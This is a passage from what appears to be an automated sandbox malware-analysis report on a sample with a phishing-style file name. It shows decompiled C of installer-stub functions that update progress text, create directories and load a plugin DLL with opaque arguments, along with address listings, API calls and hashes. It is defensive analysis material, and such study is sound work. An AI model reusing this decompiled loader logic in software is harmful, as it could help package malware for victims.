								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E00404F48(0,  &_v88); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40a860; // 0x41b020
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405A49(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                                                                                                                                                  0x00402ea7
                                                                                                                                                                                  0x00402eab
                                                                                                                                                                                  0x00402eae
                                                                                                                                                                                  0x00402eb3
                                                                                                                                                                                  0x00402eb5
                                                                                                                                                                                  0x00402eb5
                                                                                                                                                                                  0x00402ebc
                                                                                                                                                                                  0x00402ec0
                                                                                                                                                                                  0x00402ec5
                                                                                                                                                                                  0x00402ec7
                                                                                                                                                                                  0x00402ec7
                                                                                                                                                                                  0x00402ece
                                                                                                                                                                                  0x00402ed3
                                                                                                                                                                                  0x00402ede
                                                                                                                                                                                  0x00402ede
                                                                                                                                                                                  0x00402ef0
                                                                                                                                                                                  0x0040309f
                                                                                                                                                                                  0x0040309f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402ef6
                                                                                                                                                                                  0x00402efa
                                                                                                                                                                                  0x0040304c
                                                                                                                                                                                  0x0040308f
                                                                                                                                                                                  0x00403091
                                                                                                                                                                                  0x00403091
                                                                                                                                                                                  0x0040309d
                                                                                                                                                                                  0x004030a4
                                                                                                                                                                                  0x004030a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040309d
                                                                                                                                                                                  0x00403051
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403053
                                                                                                                                                                                  0x00403056
                                                                                                                                                                                  0x00403059
                                                                                                                                                                                  0x0040305c
                                                                                                                                                                                  0x0040305e
                                                                                                                                                                                  0x0040305e
                                                                                                                                                                                  0x0040306e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403075
                                                                                                                                                                                  0x0040307c
                                                                                                                                                                                  0x00403046
                                                                                                                                                                                  0x00403046
                                                                                                                                                                                  0x004030a1
                                                                                                                                                                                  0x004030a1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004030a1
                                                                                                                                                                                  0x0040307e
                                                                                                                                                                                  0x00403081
                                                                                                                                                                                  0x00403088
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040308a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403056
                                                                                                                                                                                  0x00402f06
                                                                                                                                                                                  0x00402f08
                                                                                                                                                                                  0x00402f0f
                                                                                                                                                                                  0x00402f16
                                                                                                                                                                                  0x00402f16
                                                                                                                                                                                  0x00402f1d
                                                                                                                                                                                  0x00402f25
                                                                                                                                                                                  0x00402f2f
                                                                                                                                                                                  0x00402f34
                                                                                                                                                                                  0x00402f3c
                                                                                                                                                                                  0x00402f46
                                                                                                                                                                                  0x00402f49
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402f4f
                                                                                                                                                                                  0x00402f4f
                                                                                                                                                                                  0x00402f4f
                                                                                                                                                                                  0x00402f57
                                                                                                                                                                                  0x00402f59
                                                                                                                                                                                  0x00402f59
                                                                                                                                                                                  0x00402f6a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402f70
                                                                                                                                                                                  0x00402f73
                                                                                                                                                                                  0x00402f79
                                                                                                                                                                                  0x00402f7f
                                                                                                                                                                                  0x00402f7f
                                                                                                                                                                                  0x00402f8a
                                                                                                                                                                                  0x00402f90
                                                                                                                                                                                  0x00402f95
                                                                                                                                                                                  0x00402f9c
                                                                                                                                                                                  0x00402f9f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402fa5
                                                                                                                                                                                  0x00402fab
                                                                                                                                                                                  0x00402fad
                                                                                                                                                                                  0x00402fb6
                                                                                                                                                                                  0x00402fb8
                                                                                                                                                                                  0x00402fe6
                                                                                                                                                                                  0x00402fec
                                                                                                                                                                                  0x00402ff5
                                                                                                                                                                                  0x00402ffa
                                                                                                                                                                                  0x00402ffa
                                                                                                                                                                                  0x00402fff
                                                                                                                                                                                  0x0040303a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403001
                                                                                                                                                                                  0x00403005
                                                                                                                                                                                  0x0040301c
                                                                                                                                                                                  0x00403021
                                                                                                                                                                                  0x00403024
                                                                                                                                                                                  0x00403027
                                                                                                                                                                                  0x0040302a
                                                                                                                                                                                  0x0040302e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403034
                                                                                                                                                                                  0x0040300e
                                                                                                                                                                                  0x00403015
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403017
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403017
                                                                                                                                                                                  0x00402fff
                                                                                                                                                                                  0x00403042
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00403042
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402f4f

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                                                                  • String ID: DA$ DA$... %d%%$;]A
                                                                                                                                                                                  • API String ID: 551687249-787801786
                                                                                                                                                                                  • Opcode ID: c35d4bb51d41570f736f8bea0a1f05fe9905704128f63e50029a4348a35d7e6e
                                                                                                                                                                                  • Instruction ID: 91ee06cea14faca46f7a5a314d1b96781db6e884ff6161e1c143c8ea96f9570f
                                                                                                                                                                                  • Opcode Fuzzy Hash: c35d4bb51d41570f736f8bea0a1f05fe9905704128f63e50029a4348a35d7e6e
                                                                                                                                                                                  • Instruction Fuzzy Hash: FB51907190120A9BDB10DF65EA44B9F7BB8EF44756F10813BE800B72C4D7788E51DBAA
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00404F48 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 684 404f48-404f5d 685 405013-405017 684->685 686 404f63-404f75 684->686 687 404f80-404f8c lstrlenA 686->687 688 404f77-404f7b call 405d51 686->688 690 404fa9-404fad 687->690 691 404f8e-404f9e lstrlenA 687->691 688->687 693 404fbc-404fc0 690->693 694 404faf-404fb6 SetWindowTextA 690->694 691->685 692 404fa0-404fa4 lstrcatA 691->692 692->690 695 404fc2-405004 SendMessageA * 3 693->695 696 405006-405008 693->696 694->693 695->696 696->685 697 40500a-40500d 696->697 697->685
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E00404F48(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42dbe4; // 0x103ce
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42e4b4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405D51(0, _t39, 0x429048, 0x429048, _a4);
					}
					_t26 = lstrlenA(0x429048);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42dbc8, 0x429048); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429048;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52); // executed
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429048)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429048, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                                                                                  0x00404f4e
                                                                                                                                                                                  0x00404f5a
                                                                                                                                                                                  0x00404f5d
                                                                                                                                                                                  0x00404f63
                                                                                                                                                                                  0x00404f6f
                                                                                                                                                                                  0x00404f72
                                                                                                                                                                                  0x00404f75
                                                                                                                                                                                  0x00404f7b
                                                                                                                                                                                  0x00404f7b
                                                                                                                                                                                  0x00404f81
                                                                                                                                                                                  0x00404f89
                                                                                                                                                                                  0x00404f8c
                                                                                                                                                                                  0x00404fa9
                                                                                                                                                                                  0x00404fad
                                                                                                                                                                                  0x00404fb6
                                                                                                                                                                                  0x00404fb6
                                                                                                                                                                                  0x00404fc0
                                                                                                                                                                                  0x00404fc9
                                                                                                                                                                                  0x00404fd5
                                                                                                                                                                                  0x00404fdc
                                                                                                                                                                                  0x00404fe0
                                                                                                                                                                                  0x00404fe3
                                                                                                                                                                                  0x00404ff6
                                                                                                                                                                                  0x00405004
                                                                                                                                                                                  0x00405004
                                                                                                                                                                                  0x00405008
                                                                                                                                                                                  0x0040500a
                                                                                                                                                                                  0x0040500d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040500d
                                                                                                                                                                                  0x00404f8e
                                                                                                                                                                                  0x00404f96
                                                                                                                                                                                  0x00404f9e
                                                                                                                                                                                  0x00404fa4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00404fa4
                                                                                                                                                                                  0x00404f9e
                                                                                                                                                                                  0x00404f8c
                                                                                                                                                                                  0x00405017

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                  • lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                  • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0), ref: 00404FA4
                                                                                                                                                                                  • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll), ref: 00404FB6
                                                                                                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll
                                                                                                                                                                                  • API String ID: 2531174081-2384093355
                                                                                                                                                                                  • Opcode ID: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                                                                                                                  • Instruction ID: 5247e829223e414f07dbea0a4ec6ac131d28d962b221907bbf4360a320382309
                                                                                                                                                                                  • Opcode Fuzzy Hash: 534154c7e412c88fb75b9fbb21228ed2bc61e9f55108b0b726938b2d4222e579
                                                                                                                                                                                  • Instruction Fuzzy Hash: 76218C71D00118BBDF219FA5DC84ADEBFA9EF08354F10807AF904B6291C7798E408FA8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 698 40540e-405459 CreateDirectoryA 699 40545b-40545d 698->699 700 40545f-40546c GetLastError 698->700 701 405486-405488 699->701 700->701 702 40546e-405482 SetFileSecurityA 700->702 702->699 703 405484 GetLastError 702->703 703->701
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E0040540E(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x407374;
				_v36.Group = 0x407374;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x407364;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                                                                                  0x00405419
                                                                                                                                                                                  0x0040541d
                                                                                                                                                                                  0x00405420
                                                                                                                                                                                  0x00405426
                                                                                                                                                                                  0x0040542a
                                                                                                                                                                                  0x0040542e
                                                                                                                                                                                  0x00405436
                                                                                                                                                                                  0x0040543d
                                                                                                                                                                                  0x00405443
                                                                                                                                                                                  0x0040544a
                                                                                                                                                                                  0x00405451
                                                                                                                                                                                  0x00405459
                                                                                                                                                                                  0x0040545b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040545b
                                                                                                                                                                                  0x00405465
                                                                                                                                                                                  0x0040546c
                                                                                                                                                                                  0x00405482
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405484
                                                                                                                                                                                  0x00405488

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405465
                                                                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405484
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                                                                                                                  • API String ID: 3449924974-2230009264
                                                                                                                                                                                  • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                                                                                  • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                                                                                                                  • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                                                                                  • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00401F90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 704 401f90-401f9c 705 401fa2-401fb8 call 402a3a * 2 704->705 706 402057-402059 704->706 715 401fc7-401fd5 LoadLibraryExA 705->715 716 401fba-401fc5 GetModuleHandleA 705->716 708 4021c4-4021c9 call 401423 706->708 714 4028cf-4028de 708->714 718 401fd7-401fe4 GetProcAddress 715->718 719 402050-402052 715->719 716->715 716->718 721 402023-402028 call 404f48 718->721 722 401fe6-401fec 718->722 719->708 726 40202d-402030 721->726 724 402005-40201c call 100016bd 722->724 725 401fee-401ffa call 401423 722->725 728 40201e-402021 724->728 725->726 735 401ffc-402003 725->735 726->714 729 402036-40203e call 40364f 726->729 728->726 729->714 734 402044-40204b FreeLibrary 729->734 734->714 735->726
                                                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                                                  			E00401F90(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42e4b8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42e488 =  *0x42e488 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A3A(0xfffffff0);
				 *(_t34 + 8) = E00402A3A("true");
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404F48(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, "7580360", "\xef\xbf\xbdu", 0x409000); // 						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E0040364F(_t30) != 0) {
						FreeLibrary(_t30); // executed
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                                                                                  0x00401f90
                                                                                                                                                                                  0x00401f90
                                                                                                                                                                                  0x00401f95
                                                                                                                                                                                  0x00401f9c
                                                                                                                                                                                  0x00402057
                                                                                                                                                                                  0x004021c4
                                                                                                                                                                                  0x004021c4
                                                                                                                                                                                  0x004028cf
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de
                                                                                                                                                                                  0x004028de
                                                                                                                                                                                  0x00401fab
                                                                                                                                                                                  0x00401fb5
                                                                                                                                                                                  0x00401fb8
                                                                                                                                                                                  0x00401fc7
                                                                                                                                                                                  0x00401fcb
                                                                                                                                                                                  0x00401fd1
                                                                                                                                                                                  0x00401fd5
                                                                                                                                                                                  0x00402050
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402050
                                                                                                                                                                                  0x00401fd7
                                                                                                                                                                                  0x00401fe0
                                                                                                                                                                                  0x00401fe4
                                                                                                                                                                                  0x00402028
                                                                                                                                                                                  0x00401fe6
                                                                                                                                                                                  0x00401fe9
                                                                                                                                                                                  0x00401fec
                                                                                                                                                                                  0x0040201c
                                                                                                                                                                                  0x00401fee
                                                                                                                                                                                  0x00401ff1
                                                                                                                                                                                  0x00401ffa
                                                                                                                                                                                  0x00401ffc
                                                                                                                                                                                  0x00401ffc
                                                                                                                                                                                  0x00401ffa
                                                                                                                                                                                  0x00401fec
                                                                                                                                                                                  0x00402030
                                                                                                                                                                                  0x00402045
                                                                                                                                                                                  0x00402045
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402030
                                                                                                                                                                                  0x00401fbb
                                                                                                                                                                                  0x00401fc1
                                                                                                                                                                                  0x00401fc5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleA.KERNELBASE(00000000,?,000000F0), ref: 00401FBB
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0), ref: 00404FA4
                                                                                                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll), ref: 00404FB6
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FCB
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                                                                                                                  • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 00402045
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
